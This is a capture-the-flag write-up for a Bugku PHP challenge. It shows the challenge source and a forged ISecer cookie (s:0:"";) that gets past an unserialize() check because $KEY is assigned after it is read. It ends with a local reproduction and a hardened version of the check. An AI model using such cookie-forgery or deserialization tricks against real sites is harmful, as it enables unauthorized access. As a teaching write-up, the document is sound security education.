WP-Bugku-flag.php

Challenge URL: http://120.24.86.145:8002/flagphp/

Opening the challenge shows a login form, and the challenge description says: "Clicked login and nothing happens? Hint: hint".

Following write-ups found online,

pass "hint" as a GET parameter; the constructed URL is:
http://120.24.86.145:8002/flagphp/?hint

and that returns the source code:

<?php
error_reporting(0);
include_once("flag.php");
$cookie = $_COOKIE['ISecer'];
if(isset($_GET['hint'])){
show_source(__FILE__);
}
elseif (unserialize($cookie) === "$KEY")
{
echo "$flag";
}
else {
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Login</title>
<link rel="stylesheet" href="admin.css" type="text/css">
</head>
<body>
<br>
<div class="container" align="center">
<form method="POST" action="#">
<p><input name="user" type="text" placeholder="Username"></p>
<p><input name="password" type="password" placeholder="Password"></p>
<p><input value="Login" type="button"/></p>
</form>
</div>
</body>
</html>

<?php
}
$KEY='ISecer:www.isecer.com';
?>

This means: when the unserialize()d value of $cookie (the ISecer cookie) is strictly equal (===) to $KEY, the flag is printed.
Note that the value of $KEY at the time of the comparison is not the 'ISecer:www.isecer.com' shown in the source, but "" (empty): the assignment $KEY='ISecer:www.isecer.com'; only runs after the if/elseif has already been evaluated, so "$KEY" interpolates an undefined variable to an empty string.

So a one-line PHP script:

<?php
print_r(serialize(""));
?>

gives the result:
s:0:"";

Capture the request in Burp Suite, set the cookie ISecer to this value, and send it (Go):

and we get flag{unserialize_by_virink}
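To make the ordering bug concrete, here is an added example (not the challenge's code and not the write-up's own script) that reproduces the comparison from flag.php locally and puts a hardened version next to it. The function names challenge_check and hardened_check and the constant KEY are my own; the cookie name and the key string are the ones from the challenge source.

```php
<?php
// Added example: why the cookie s:0:""; passes the check in flag.php,
// and what the same check looks like without the two defects.

// Mirrors the challenge: error_reporting(0) hides the "undefined variable"
// warning that would otherwise point at the bug.
error_reporting(0);

// Same control flow as the original: $KEY is read in the comparison before
// the line that assigns it, so "$KEY" interpolates to "" at that moment and
// the later assignment is dead code. Attacker-controlled data is also fed
// straight into unserialize().
function challenge_check(string $cookie): bool
{
    $match = (unserialize($cookie) === "$KEY");   // "$KEY" is "" here
    $KEY = 'ISecer:www.isecer.com';                // runs too late to matter
    return $match;
}

// Hardened form (assumed fix, not from the page): the secret is a constant
// defined before use, no unserialize() on cookie input, and a constant-time
// comparison so the value cannot be recovered byte-by-byte via timing.
const KEY = 'ISecer:www.isecer.com';

function hardened_check(string $cookie): bool
{
    return hash_equals(KEY, $cookie);
}

// Constructed inputs for a local run.
$forged   = serialize("");                          // the write-up's payload: s:0:"";
$expected = serialize('ISecer:www.isecer.com');     // what one might naively try

var_dump(challenge_check($forged));                 // original check, forged cookie
var_dump(challenge_check($expected));               // original check, "real" key
var_dump(hardened_check($forged));                  // hardened check, forged cookie
var_dump(hardened_check('ISecer:www.isecer.com'));  // hardened check, real key
```

Run with php on the command line. The forged cookie s:0:""; satisfies challenge_check because both sides of === are the empty string, while the serialized form of the real key does not, since $KEY is still undefined when it is compared; hardened_check only accepts the literal key, because the constant exists before the comparison and the cookie is never unserialized. The defensive lessons are the ones the write-up's source illustrates: never pass cookie or request data to unserialize(), and never rely on a variable that is assigned after the code path that reads it.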
